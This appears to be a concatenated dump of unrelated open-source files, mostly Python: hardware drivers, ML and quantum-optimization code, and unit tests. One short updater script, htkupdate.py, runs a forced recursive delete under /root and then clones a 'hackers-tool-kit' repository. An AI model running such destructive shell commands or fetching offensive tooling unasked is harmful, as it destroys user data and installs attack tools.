#layer_input = tf.compat.v1.placeholder(tf.float32, shape=(batch_size*seq_length, hidden_size))
## Tensor of shape [batch_size, from_seq_length, to_seq_length].
#attention_mask = tf.compat.v1.placeholder(tf.float32, shape=(batch_size, seq_length, seq_length))
#
#output_rnn = transformer_cell(input_tensor=layer_input,#tf.reshape(layer_input, [-1, hidden_size]),
# attention_mask=attention_mask,
# hidden_size=hidden_size,
# num_attention_heads=num_attention_heads,
# attention_head_size=size_per_head,
# batch_size = batch_size,
# seq_length = seq_length,
# intermediate_size=1280)
|
calvinextras/calvinsys/io/gpiopin/raspberry_pi/PIGPIOPin.py
|
gabrielcercel/calvin-base
| 334 |
102467
|
<reponame>gabrielcercel/calvin-base<filename>calvinextras/calvinsys/io/gpiopin/raspberry_pi/PIGPIOPin.py
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvinextras.calvinsys.io.gpiopin import BaseGPIOPin
from calvin.utilities.calvinlogger import get_logger
import pigpio
_log = get_logger(__name__)
class PIGPIOPin(BaseGPIOPin.BaseGPIOPin):
"""
Calvinsys object handling a general-purpose input/output pin using the RPi.GPIO package
"""
PULL = {"up": pigpio.PUD_UP, "down": pigpio.PUD_DOWN, "off": pigpio.PUD_OFF}
MODE = {"in": pigpio.INPUT, "out": pigpio.OUTPUT}
EDGE = {"rising": pigpio.RISING_EDGE, "falling": pigpio.FALLING_EDGE, "both": pigpio.EITHER_EDGE}
def init(self, pin, direction, pull=None, edge=None, bouncetime=None, **kwargs):
self._values = []
self._pin = pin
self._direction = direction
self._debounce = 1000*bouncetime if bouncetime else None # bouncetime is ms, pigpio uses us
self._edge = edge
self._gpio = pigpio.pi()
self._cb = None
try :
mode = self.MODE[direction.lower()]
except KeyError:
raise Exception("Unknown direction '{}', should be IN, OUT".format(direction))
if mode == pigpio.INPUT:
try:
pud = self.PULL[pull.lower()] if pull else pigpio.PUD_OFF
except KeyError:
raise Exception("Unknown pull '{}', should be UP, DOWN, OFF".format(pull))
self._gpio.set_pull_up_down(pin, pud)
if self._debounce:
self._gpio.set_glitch_filter(pin, self._debounce)
self._gpio.set_mode(pin, mode)
if edge is not None:
try:
detect = self.EDGE[edge.lower()]
except KeyError:
raise Exception("Unknown edge '{}', should be RISING, FALLING, BOTH")
self._cb = self._gpio.callback(pin, detect, self._edge_cb)
def _edge_cb(self, pin, edge, tick):
if edge != 2:
self._values.append(edge)
self.scheduler_wakeup()
def can_write(self):
return self._direction.lower() == "out"
def write(self, value):
self._gpio.write(self._pin, 1 if value else 0)
def can_read(self):
if self._direction.lower() == 'in':
return bool(self._values)
return False
def read(self):
if self._values:
return self._values.pop(0)
else:
return self._gpio.read(self._pin)
def close(self):
if self._cb:
self._cb.cancel()
del self._gpio
self._gpio = None
|
dm_control/manipulation/shared/observations.py
|
h8907283/dm_control
| 2,863 |
102483
|
# Copyright 2018 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Shared configuration options for observations."""
import collections
import numpy as np
class ObservableSpec(collections.namedtuple(
'ObservableSpec',
['enabled', 'update_interval', 'buffer_size', 'delay', 'aggregator',
'corruptor'])):
"""Configuration options for generic observables."""
__slots__ = ()
class CameraObservableSpec(collections.namedtuple(
'CameraObservableSpec', ('height', 'width') + ObservableSpec._fields)):
"""Configuration options for camera observables."""
__slots__ = ()
class ObservationSettings(collections.namedtuple(
'ObservationSettings', ['proprio', 'ftt', 'prop_pose', 'camera'])):
"""Container of `ObservableSpecs` grouped by category."""
__slots__ = ()
class ObservableNames(collections.namedtuple(
'ObservableNames', ['proprio', 'ftt', 'prop_pose', 'camera'])):
"""Container that groups the names of observables by category."""
__slots__ = ()
def __new__(cls, proprio=(), ftt=(), prop_pose=(), camera=()):
return super(ObservableNames, cls).__new__(
cls, proprio=proprio, ftt=ftt, prop_pose=prop_pose, camera=camera)
# Global defaults for "feature" observables (i.e. anything that isn't a camera).
_DISABLED_FEATURE = ObservableSpec(
enabled=False,
update_interval=1,
buffer_size=1,
delay=0,
aggregator=None,
corruptor=None)
_ENABLED_FEATURE = _DISABLED_FEATURE._replace(enabled=True)
# Force, torque and touch-sensor readings are scaled using a symmetric
# logarithmic transformation that handles 0 and negative values.
_symlog1p = lambda x, random_state: np.sign(x) * np.log1p(abs(x))
_DISABLED_FTT = _DISABLED_FEATURE._replace(corruptor=_symlog1p)
_ENABLED_FTT = _ENABLED_FEATURE._replace(corruptor=_symlog1p)
# Global defaults for camera observables.
_DISABLED_CAMERA = CameraObservableSpec(
height=84,
width=84,
enabled=False,
update_interval=1,
buffer_size=1,
delay=0,
aggregator=None,
corruptor=None)
_ENABLED_CAMERA = _DISABLED_CAMERA._replace(enabled=True)
# Predefined sets of configurations options to apply to each category of
# observable.
PERFECT_FEATURES = ObservationSettings(
proprio=_ENABLED_FEATURE,
ftt=_ENABLED_FTT,
prop_pose=_ENABLED_FEATURE,
camera=_DISABLED_CAMERA)
VISION = ObservationSettings(
proprio=_ENABLED_FEATURE,
ftt=_ENABLED_FTT,
prop_pose=_DISABLED_FEATURE,
camera=_ENABLED_CAMERA)
JACO_ARM_OBSERVABLES = ObservableNames(
proprio=['joints_pos', 'joints_vel'], ftt=['joints_torque'])
JACO_HAND_OBSERVABLES = ObservableNames(
proprio=['joints_pos', 'joints_vel', 'pinch_site_pos', 'pinch_site_rmat'])
FREEPROP_OBSERVABLES = ObservableNames(
prop_pose=['position', 'orientation', 'linear_velocity',
'angular_velocity'])
def make_options(obs_settings, obs_names):
"""Constructs a dict of configuration options for a set of named observables.
Args:
obs_settings: An `ObservationSettings` instance.
obs_names: An `ObservableNames` instance.
Returns:
A nested dict containing `{observable_name: {option_name: value}}`.
"""
observable_options = {}
for category, spec in obs_settings._asdict().items():
for observable_name in getattr(obs_names, category):
observable_options[observable_name] = spec._asdict()
return observable_options
|
pypy/module/pypyjit/test/test_pyframe.py
|
nanjekyejoannah/pypy
| 381 |
102547
|
import py
class TestJitTraceInteraction(object):
def test_trace_while_blackholing(self):
import sys
l = []
printed = []
def trace(frame, event, arg):
l.append((frame.f_code.co_name, event))
return trace
def g(i, x):
if i > x - 10:
printed.append(i)
if i == x - 5:
sys.settrace(trace)
def f(x):
res = 0
for i in range(x):
res += i
g(i, x)
f(10)
sys.settrace(None)
print printed
assert l == [('g', 'call'), ('g', 'line'), ('g', 'line'), ('g', 'line'), ('g', 'return')] * 4
l1 = l
l = []
printed = []
f(10000)
sys.settrace(None)
print printed
assert l == l1
|
PyObjCTest/test_nslock.py
|
Khan/pyobjc-framework-Cocoa
| 132 |
102633
|
<reponame>Khan/pyobjc-framework-Cocoa
from Foundation import *
import objc
from PyObjCTools.TestSupport import *
class TestNSLockProtocols (TestCase):
def testLockIsLock(self):
# Test for bug #1735937
lock = NSLock.alloc().init()
self.assert_(lock.conformsToProtocol_(objc.protocolNamed("NSLocking")))
self.assert_(lock.conformsToProtocol_(protocols.NSLocking))
def testMethods(self):
self.assertResultIsBOOL(NSLock.tryLock)
self.assertResultIsBOOL(NSLock.lockBeforeDate_)
self.assertResultIsBOOL(NSConditionLock.tryLock)
self.assertResultIsBOOL(NSConditionLock.tryLockWhenCondition_)
self.assertResultIsBOOL(NSConditionLock.lockBeforeDate_)
self.assertResultIsBOOL(NSConditionLock.lockWhenCondition_beforeDate_)
self.assertResultIsBOOL(NSRecursiveLock.tryLock)
self.assertResultIsBOOL(NSRecursiveLock.lockBeforeDate_)
self.assertResultIsBOOL(NSCondition.waitUntilDate_)
if __name__ == "__main__":
main()
|
compiler_opt/rl/random_net_distillation_test.py
|
google/ml-compiler-opt
| 130 |
102657
|
# coding=utf-8
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for random_network_distillation."""
from absl.testing import parameterized
import tensorflow as tf
from tf_agents.networks import encoding_network
from tf_agents.networks import expand_dims_layer
from tf_agents.trajectories import time_step
from tf_agents.trajectories import trajectory
from compiler_opt.rl import random_net_distillation
def _processing_layer_creator():
expand_dims_op = expand_dims_layer.ExpandDims(-1)
def observation_processing_layer(_):
"""Creates the toy layer to process observation."""
def discard_feature(obs):
expanded_obs = expand_dims_op(obs)
return tf.ones_like(expanded_obs, dtype=tf.float32)
func = discard_feature
return tf.keras.layers.Lambda(func)
return observation_processing_layer
def _create_test_data(batch_size, sequence_length):
test_trajectory = trajectory.Trajectory(
step_type=tf.fill([batch_size, sequence_length], 1),
observation={
'edge_count':
tf.fill([batch_size, sequence_length],
tf.constant(10, dtype=tf.int64))
},
action=tf.fill([batch_size, sequence_length],
tf.constant(1, dtype=tf.int64)),
policy_info=(),
next_step_type=tf.fill([batch_size, sequence_length], 1),
reward=tf.fill([batch_size, sequence_length], 2.0),
discount=tf.fill([batch_size, sequence_length], 1.0),
)
def test_data_iterator():
while True:
yield test_trajectory
return test_data_iterator()
class RandomNetworkDistillationTest(tf.test.TestCase, parameterized.TestCase):
def setUp(self):
super(RandomNetworkDistillationTest, self).setUp()
self._update_frequency = 1
observation_spec = {
'edge_count': tf.TensorSpec(
dtype=tf.int64, shape=(), name='edge_count')
}
self._time_step_spec = time_step.time_step_spec(observation_spec)
def test_train_on_batch(self):
data_iterator = _create_test_data(batch_size=3, sequence_length=3)
# initialize the random_network_distillation instance
random_network_distillation = random_net_distillation.RandomNetworkDistillation(
time_step_spec=self._time_step_spec,
preprocessing_layer_creator=_processing_layer_creator(),
encoding_network=encoding_network.EncodingNetwork,
update_frequency=self._update_frequency)
experience = next(data_iterator)
# test the RND train function return type
for _ in range(5):
new_experience = random_network_distillation.train(experience)
self.assertIsInstance(new_experience, trajectory.Trajectory)
# the rest of experience should remain the same except reward
self.assertAllEqual(experience.step_type, new_experience.step_type)
self.assertAllEqual(experience.observation, new_experience.observation)
self.assertAllEqual(experience.action, new_experience.action)
self.assertAllEqual(experience.policy_info, new_experience.policy_info)
self.assertAllEqual(experience.next_step_type, experience.next_step_type)
self.assertAllEqual(experience.discount, new_experience.discount)
# reward should have same shape
self.assertAllEqual(experience.reward.shape, new_experience.reward.shape)
# new reward should has finite value
self.assertFalse(tf.math.is_inf(tf.reduce_sum(new_experience.reward)))
if __name__ == '__main__':
tf.test.main()
|
nativedroid/nativedroid/analyses/resolver/jni/java_type/primitive.py
|
CherishAZ/Argus-SAF
| 152 |
102666
|
<filename>nativedroid/nativedroid/analyses/resolver/jni/java_type/primitive.py<gh_stars>100-1000
from nativedroid.analyses.resolver.jni.jtype import JType
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2018, The Argus-SAF Project"
__license__ = "Apache v2.0"
class JBoolean(JType):
def __init__(self, project):
super(JBoolean, self).__init__(project, 'jboolean', 1)
class JByte(JType):
def __init__(self, project):
super(JByte, self).__init__(project, 'jbyte', 1)
class JChar(JType):
def __init__(self, project):
super(JChar, self).__init__(project, 'jchar', 2)
class JShort(JType):
def __init__(self, project):
super(JShort, self).__init__(project, 'jshort', 2)
class JInt(JType):
def __init__(self, project):
super(JInt, self).__init__(project, 'jint', 4)
class JLong(JType):
def __init__(self, project):
super(JLong, self).__init__(project, 'jlong', 8)
class JFloat(JType):
def __init__(self, project):
super(JFloat, self).__init__(project, 'jfloat', 4)
class JDouble(JType):
def __init__(self, project):
super(JDouble, self).__init__(project, 'jdouble', 8)
class Void(JType):
def __init__(self, project):
super(Void, self).__init__(project, 'void')
|
release/stubs.min/System/Runtime/InteropServices/__init___parts/FieldOffsetAttribute.py
|
htlcnn/ironpython-stubs
| 182 |
102668
|
<filename>release/stubs.min/System/Runtime/InteropServices/__init___parts/FieldOffsetAttribute.py<gh_stars>100-1000
class FieldOffsetAttribute(Attribute,_Attribute):
"""
Indicates the physical position of fields within the unmanaged representation of a class or structure.
FieldOffsetAttribute(offset: int)
"""
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,offset):
""" __new__(cls: type,offset: int) """
pass
Value=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the offset from the beginning of the structure to the beginning of the field.
Get: Value(self: FieldOffsetAttribute) -> int
"""
|
desktop/core/ext-py/pytidylib-0.3.2/tests/test_docs.py
|
kokosing/hue
| 5,079 |
102682
|
# -*- coding: utf-8 -*-
# Copyright 2009-2014 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import unicode_literals
import unittest
from tidylib import Tidy, PersistentTidy, tidy_document
DOC = u'''<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title></title>
</head>
<body>
%s
</body>
</html>
'''
class TestDocs1(unittest.TestCase):
""" Test some sample documents """
def test_p_element_closed(self):
h = "<p>hello"
expected = DOC % '''<p>\n hello\n </p>'''
doc, err = tidy_document(h)
self.assertEqual(doc, expected)
def test_alt_added_to_img(self):
h = "<img src='foo'>"
expected = DOC % '''<img src='foo' alt="bar">'''
doc, err = tidy_document(h, {'alt-text': 'bar'})
self.assertEqual(doc, expected)
def test_entity_preserved_using_bytes(self):
h = b"é"
expected = (DOC % "é").encode('utf-8')
doc, err = tidy_document(h, {'preserve-entities': 1})
self.assertEqual(doc, expected)
def test_numeric_entities_using_bytes(self):
h = b"é"
expected = (DOC % "é").encode('utf-8')
doc, err = tidy_document(h, {'numeric-entities': 1, 'output-encoding': 'ascii'})
self.assertEqual(doc, expected)
def test_non_ascii_preserved(self):
h = u"unicode string ß"
expected = DOC % h
doc, err = tidy_document(h)
self.assertEqual(doc, expected)
def test_large_document(self):
h = u"A" * 10000
expected = DOC % h
doc, err = tidy_document(h)
self.assertEqual(doc, expected)
def test_can_use_two_tidy_instances(self):
t1 = Tidy()
t2 = Tidy()
self.assertEqual(t1.tidy_document(DOC % 'a')[0], DOC % 'a')
self.assertEqual(t2.tidy_document(DOC % 'b')[0], DOC % 'b')
def test_tidy_doesnt_persist_options(self):
tidy = Tidy()
# This option makes it a fragment
doc, err = tidy.tidy_document(DOC % 'a', {'show-body-only': 1})
self.assertEqual(doc, 'a\n')
doc, err = tidy.tidy_document(DOC % 'a')
self.assertEqual(doc, DOC % 'a')
def test_persistent_tidy_does_persist_options(self):
tidy = PersistentTidy()
# This option makes it a fragment
doc, err = tidy.tidy_document(DOC % 'a', {'show-body-only': 1})
self.assertEqual(doc, 'a\n')
doc, err = tidy.tidy_document(DOC % 'a')
self.assertEqual(doc, 'a\n')
def test_xmlns_large_document_xml_corner_case(self):
# Test for a super weird edge case in Tidy that can cause it to return
# the wrong required buffer size.
body = '<span><span>A</span></span>' + 'A' * 7937
html = '<html xmlns="http://www.w3.org/1999/xhtml">' + body
doc, err = tidy_document(html, {'output-xml': 1})
self.assertEqual(doc.strip()[-7:], "</html>")
if __name__ == '__main__':
unittest.main()
|
qiskit_optimization/converters/flip_problem_sense.py
|
X-Libor/qiskit-optimization
| 109 |
102723
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Converters to flip problem sense, e.g. maximization to minimization and vice versa."""
import copy
from typing import Optional, List, Union
import numpy as np
from .quadratic_program_converter import QuadraticProgramConverter
from ..exceptions import QiskitOptimizationError
from ..problems.quadratic_objective import ObjSense
from ..problems.quadratic_program import QuadraticProgram
class _FlipProblemSense(QuadraticProgramConverter):
"""Flip the sense of a problem, e.g. converts from maximization to minimization and
vice versa, regardless of the current sense."""
def __init__(self) -> None:
self._src_num_vars: Optional[int] = None
def convert(self, problem: QuadraticProgram) -> QuadraticProgram:
"""Flip the sense of a problem.
Args:
problem: The problem to be flipped.
Returns:
A converted problem, that has the flipped sense.
"""
# copy original number of variables as reference.
self._src_num_vars = problem.get_num_vars()
desired_sense = self._get_desired_sense(problem)
# flip the problem sense
if problem.objective.sense != desired_sense:
desired_problem = copy.deepcopy(problem)
desired_problem.objective.sense = desired_sense
desired_problem.objective.constant = (-1) * problem.objective.constant
desired_problem.objective.linear = (-1) * problem.objective.linear.coefficients
desired_problem.objective.quadratic = (-1) * problem.objective.quadratic.coefficients
else:
desired_problem = problem
return desired_problem
def _get_desired_sense(self, problem: QuadraticProgram) -> ObjSense:
"""
Computes a desired sense of the problem. By default, flip the sense.
Args:
problem: a problem to check
Returns:
A desired sense, if the problem was a minimization problem, then the sense is
maximization and vice versa.
"""
if problem.objective.sense == ObjSense.MAXIMIZE:
return ObjSense.MINIMIZE
else:
return ObjSense.MAXIMIZE
def interpret(self, x: Union[np.ndarray, List[float]]) -> np.ndarray:
"""Convert the result of the converted problem back to that of the original problem.
Args:
x: The result of the converted problem or the given result in case of FAILURE.
Returns:
The result of the original problem.
Raises:
QiskitOptimizationError: if the number of variables in the result differs from
that of the original problem.
"""
if len(x) != self._src_num_vars:
raise QiskitOptimizationError(
f"The number of variables in the passed result differs from "
f"that of the original problem, should be {self._src_num_vars}, but got {len(x)}."
)
return np.asarray(x)
class MaximizeToMinimize(_FlipProblemSense):
"""Convert a maximization problem to a minimization problem only if it is a maximization
problem, otherwise problem's sense is unchanged."""
def _get_desired_sense(self, problem: QuadraticProgram) -> ObjSense:
return ObjSense.MINIMIZE
class MinimizeToMaximize(_FlipProblemSense):
"""Convert a minimization problem to a maximization problem only if it is a minimization
problem, otherwise problem's sense is unchanged."""
def _get_desired_sense(self, problem: QuadraticProgram) -> ObjSense:
return ObjSense.MAXIMIZE
|
htkupdate.py
|
otherbeast/hackers-tool-kit
| 393 |
102730
|
import os
print "UPDATING..."
os.system("cd")
os.system('cd /root/ && rm -fr hackers-tool-kit && git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit && echo "[UPDATED]: Restart Your Terminal"')
|
patreonmanager/apps.py
|
crydotsnake/djangogirls
| 446 |
102731
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class PatreonManagerConfig(AppConfig):
name = 'patreonmanager'
verbose_name = _("Patreon Manager")
|
cupcake2/ice2/create_seed.py
|
ArthurDondi/cDNA_Cupcake
| 205 |
102794
|
__author__ = 'lachesis'
import os, sys
from Bio import SeqIO
from cupcake.io.SeqReaders import LazyFastaReader
from cupcake2.io.FileIO import write_seqids_to_fasta
input = 'isoseq_flnc.fasta'
NUM_SEQS_PER_BATCH = 50000
d = LazyFastaReader(input)
lens = [(r.id, len(r.seq)) for r in SeqIO.parse(open(input), 'fasta')]
lens.sort(key=lambda x: x[1], reverse=True)
n = len(lens)
# start at 1% of the data
starting_seed_index = n * 1 / 100
good = [x[0] for x in lens[starting_seed_index:starting_seed_index+NUM_SEQS_PER_BATCH]]
write_seqids_to_fasta(good, 'seed0.fasta', d)
batch_index = 1
starting_index = starting_seed_index+NUM_SEQS_PER_BATCH
while starting_index < n:
write_seqids_to_fasta([x[0] for x in lens[starting_index:starting_index+NUM_SEQS_PER_BATCH]], \
"batch{0}.fasta".format(batch_index), d)
starting_index += NUM_SEQS_PER_BATCH
batch_index += 1
write_seqids_to_fasta([x[0] for x in lens[:starting_seed_index]], "batch{0}.fasta".format(batch_index), d)
|
buildscripts/__init__.py
|
EshaMaharishi/pubsub-1
| 324 |
102848
|
import os;
def findHacks( un ):
return None
|
tests/custom_cluster/test_compact_catalog_updates.py
|
Keendata/impala
| 746 |
102864
|
<filename>tests/custom_cluster/test_compact_catalog_updates.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Test Catalog behavior when --compact_catalog_topic is false.
import pytest
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
class TestCompactCatalogUpdates(CustomClusterTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def setup_class(cls):
if cls.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
super(TestCompactCatalogUpdates, cls).setup_class()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(impalad_args="--compact_catalog_topic=false",
catalogd_args="--compact_catalog_topic=false")
def test_non_compact_catalog_topic_updates(self):
"""Start Impala cluster with compact catalog update topics disabled and run a set
of smoke tests to verify that catalog updates are received properly."""
try:
# Check that initial catalop update topic has been received
impalad1 = self.cluster.impalads[0]
assert impalad1.service.get_metric_value("catalog.num-tables") > 0
impalad2 = self.cluster.impalads[1]
assert impalad2.service.get_metric_value("catalog.num-tables") > 0
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
query_options = {"sync_ddl" : 1}
self.execute_query_expect_success(client1, "refresh functional.alltypes",
query_options)
result = client2.execute("select count(*) from functional.alltypes")
assert result.data[0] == "7300"
self.execute_query_expect_success(client1, "invalidate metadata", query_options)
self.execute_query_expect_success(client2, "show databases")
assert impalad1.service.get_metric_value("catalog.num-databases") > 0
assert impalad2.service.get_metric_value("catalog.num-databases") > 0
finally:
client1.close()
client2.close()
|
AutoDL Design/autodl.py
|
houj04/AutoDL
| 155 |
102880
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
AutoDL definition
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import argparse
import numpy as np
import subprocess
import paddle.fluid as fluid
from reinforce_policy_gradient import ReinforcePolicyGradient
from policy_model import PolicyModel
from autodl_agent import AutoDLAgent
import utils
import collections
class AutoDL(object):
"""
AutoDL class
"""
def __init__(self):
"""
init
"""
self.parse_args = self._init_parser()
self.bl_decay = self.parse_args.bl_decay
self.log_dir = self.parse_args.log_dir
self.early_stop = self.parse_args.early_stop
self.data_path = self.parse_args.data_path
self.num_models = self.parse_args.num_models
self.batch_size = self.parse_args.batch_size
self.chunk_size= self.parse_args.chunk_size
self._init_dir_path()
self.model = PolicyModel(self.parse_args)
algo_hyperparas = {'lr': self.parse_args.learning_rate}
self.algorithm = ReinforcePolicyGradient(self.model,
hyperparas=algo_hyperparas)
self.autodl_agent = AutoDLAgent(self.algorithm, self.parse_args)
self.total_reward = 0
def _init_dir_path(self):
"""
init dir path
"""
utils.prepare(self.log_dir)
utils.prepare(self.log_dir, "actions")
utils.prepare(self.log_dir, "rewards")
utils.prepare(self.log_dir, "checkpoints")
def _init_parser(self):
"""
init parser
"""
parser = argparse.ArgumentParser(description='AutoDL Parser',
prog='AutoDL')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s 0.1')
parser.add_argument('--num_nodes', dest="num_nodes", nargs="?",
type=int, const=10, default=10,
help="number of nodes")
parser.add_argument('--num_tokens', dest="num_tokens", nargs="?",
type=int, const=10, default=10,
help="number of tokens")
parser.add_argument('--learning_rate', dest="learning_rate", nargs="?",
type=float, default=1e-3,
help="learning rate")
parser.add_argument('--batch_size', dest="batch_size", nargs="?",
type=int, const=10, default=10, help="batch size")
parser.add_argument('--num_models', dest="num_models", nargs="?",
type=int, const=32000, default=32000,
help="maximum number of models sampled")
parser.add_argument('--early_stop', dest="early_stop", nargs="?",
type=int, const=20, default=20, help="early stop")
parser.add_argument('--log_dir', dest="log_dir", nargs="?", type=str,
const="./log", default="./log",
help="directory of log")
parser.add_argument('--input_size', dest="input_size", nargs="?",
type=int, const=10, default=10, help="input size")
parser.add_argument('--hidden_size', dest="hidden_size", nargs="?",
type=int, const=64, default=64, help="hidden size")
parser.add_argument('--num_layers', dest="num_layers", nargs="?",
type=int, const=2, default=2, help="num layers")
parser.add_argument('--bl_decay', dest="bl_decay", nargs="?",
type=float, const=0.9, default=0.9,
help="base line decay")
# inception train config
parser.add_argument('--data_path', dest="data_path", nargs="?",
type=str, default="./cifar/pickle-cifar-10",
help="path of data files")
parser.add_argument('--chunk_size', dest="chunk_size", nargs="?",
type=int, const=100, default=100,
help="chunk size")
parse_args = parser.parse_args()
return parse_args
def supervisor(self, mid):
"""
execute cnn training
sample cmd: python -u inception_train/train.py --mid=9 \
--early_stop=20 --data_path=./cifar/pickle-cifar-10
"""
tokens, adjvec = utils.load_action(mid, self.log_dir)
cmd = ("CUDA_VISIBLE_DEVICES=1 python -u inception_train/train.py \
--mid=%d --early_stop=%d --logdir=%s --data_path=%s --chunk_size=%d") % \
(mid, self.early_stop, self.log_dir, self.data_path, self.chunk_size)
print("cmd:{}".format(cmd))
while True:
try:
subprocess.check_call(cmd, shell=True)
break
except subprocess.CalledProcessError as e:
print("[%s] training model #%d exits with exit code %d" %
(utils.stime(), mid, e.returncode), file=sys.stderr)
return
def simple_run(self):
"""
simple run
"""
print("Simple run target is 20")
mid = 0
shadow = 0
is_first = True
while mid <= self.num_models:
actions_to, actions_ad = self.autodl_agent.sample()
rewards = np.count_nonzero(actions_to == 1, axis=1).astype("int32")
# moving average
current_mean_reward = np.mean(rewards)
if is_first:
shadow = current_mean_reward
is_first = False
else:
shadow = shadow * self.bl_decay \
+ current_mean_reward * (1 - self.bl_decay)
self.autodl_agent.learn((np.array(actions_to).astype("int32"),
np.array(actions_ad).astype("int32")),
rewards - shadow)
if mid % 10 == 0:
print('mid=%d, average rewards=%.3f' % (mid, np.mean(rewards)))
mid += 1
def run(self):
"""
run
"""
rewards = []
mid = 0
while mid <= self.num_models:
actions_to, actions_ad = self.autodl_agent.sample()
for action in zip(actions_to, actions_ad):
utils.dump_action(mid, action, self.log_dir)
self.supervisor(mid)
current_reward = utils.load_reward(mid, self.log_dir)
if not np.isnan(current_reward):
rewards.append(current_reward.item())
mid += 1
if len(rewards) % self.batch_size == 0:
print("[%s] step = %d, average accuracy = %.3f" %
(utils.stime(), self.autodl_agent.global_step,
np.mean(rewards)))
rewards_array = np.array(rewards).astype("float32")
if self.total_reward == 0:
self.total_reward = rewards_array.mean()
else:
self.total_reward = self.total_reward * self.bl_decay \
+ (1 - self.bl_decay) * rewards_array.mean()
rewards_array = rewards_array - self.total_reward
self.autodl_agent.learn([actions_to.astype("int32"),
actions_ad.astype("int32")],
rewards_array ** 3)
rewards = []
|
paddleslim/nas/one_shot/one_shot_nas.py
|
zhuguiqian/PaddleSlim
| 923 |
102886
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import paddle.fluid as fluid
from ...common import SAController
__all__ = ['OneShotSuperNet', 'OneShotSearch']
def OneShotSearch(model, eval_func, strategy='sa', search_steps=100):
"""
Search a best tokens which represents a sub-network.
Args:
